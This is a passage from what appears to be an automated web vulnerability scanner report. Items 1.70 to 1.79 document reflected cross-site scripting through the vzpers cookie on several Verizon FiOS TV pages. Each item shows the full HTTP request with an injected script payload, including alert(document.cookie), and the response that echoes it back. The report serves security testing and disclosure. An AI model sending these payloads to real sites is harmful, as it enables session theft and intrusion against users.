<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE3746<SCRIPT>ALERT(1)</SCRIPT>02F08D404C8 </DIV>
...[SNIP]...

1.70. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload d5f2f<script>alert(1)</script>a9fa44ab1ff was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXd5f2f<script>alert(1)</script>a9fa44ab1ff; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 101377
Expires: Mon, 13 Dec 2010 00:51:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXD5F2F<SCRIPT>ALERT(1)</SCRIPT>A9FA44AB1FF </DIV>
...[SNIP]...

1.71. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96410'><script>alert(1)</script>7fffa03d3e6 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX96410'><script>alert(1)</script>7fffa03d3e6; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102923
Expires: Mon, 13 Dec 2010 00:51:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX96410'><SCRIPT>ALERT(1)</SCRIPT>7FFFA03D3E6 ' />
...[SNIP]...

1.72. http://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Check_Availability/Check_Availability.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f6db'><script>alert(1)</script>eec6d807b1c was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Check_Availability/Check_Availability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX4f6db'><script>alert(1)</script>eec6d807b1c; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58326
Expires: Mon, 13 Dec 2010 00:48:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:48:19 GMT
Connection: close
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:48:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:48:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:48:19 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><title>
Verizon | FiOS TV Availability
</title>
<style>
.channel_list .essent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4F6DB'><SCRIPT>ALERT(1)</SCRIPT>EEC6D807B1C ' />
...[SNIP]...

1.73. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1e3e0'><script>alert(1)</script>d807238ccca was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX1e3e0'><script>alert(1)</script>d807238ccca; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79411
Expires: Mon, 13 Dec 2010 00:51:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1E3E0'><SCRIPT>ALERT(1)</SCRIPT>D807238CCCA ' />
...[SNIP]...

1.74. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload ba591<script>alert(1)</script>cd8eac21121 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXba591<script>alert(1)</script>cd8eac21121; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79407
Expires: Mon, 13 Dec 2010 00:51:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXBA591<SCRIPT>ALERT(1)</SCRIPT>CD8EAC21121 </DIV>
...[SNIP]...

1.75. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 43c37<script>alert(1)</script>a83048ec3fa was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX43c37<script>alert(1)</script>a83048ec3fa; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110749
Expires: Mon, 13 Dec 2010 00:51:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:35 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:35 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX43C37<SCRIPT>ALERT(1)</SCRIPT>A83048EC3FA </DIV>
...[SNIP]...

1.76. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3bb87'><script>alert(1)</script>08cbf1322ca was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX3bb87'><script>alert(1)</script>08cbf1322ca; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110753
Expires: Mon, 13 Dec 2010 00:51:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3BB87'><SCRIPT>ALERT(1)</SCRIPT>08CBF1322CA ' />
...[SNIP]...

1.77. http://www22.verizon.com/Residential/FiOSTV/Overviewab/Overviewab [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overviewab/Overviewab

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload aced1<script>alert(1)</script>04caa04edc3 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overviewab/Overviewab HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXaced1<script>alert(1)</script>04caa04edc3; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110739
Expires: Mon, 13 Dec 2010 00:51:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:16 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXACED1<SCRIPT>ALERT(1)</SCRIPT>04CAA04EDC3 </DIV>
...[SNIP]...

1.78. http://www22.verizon.com/Residential/FiOSTV/Overviewab/Overviewab [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overviewab/Overviewab

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17572'><script>alert(1)</script>c06587bbd1f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overviewab/Overviewab HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX17572'><script>alert(1)</script>c06587bbd1f; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110743
Expires: Mon, 13 Dec 2010 00:51:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:13 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:51:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:51:13 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX17572'><SCRIPT>ALERT(1)</SCRIPT>C06587BBD1F ' />
...[SNIP]...

1.79. http://www22.verizon.com/Residential/FiOSTV/Plans/Plans.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Plans/Plans.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46426'><script>alert(1)</script>15b784f92f9 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

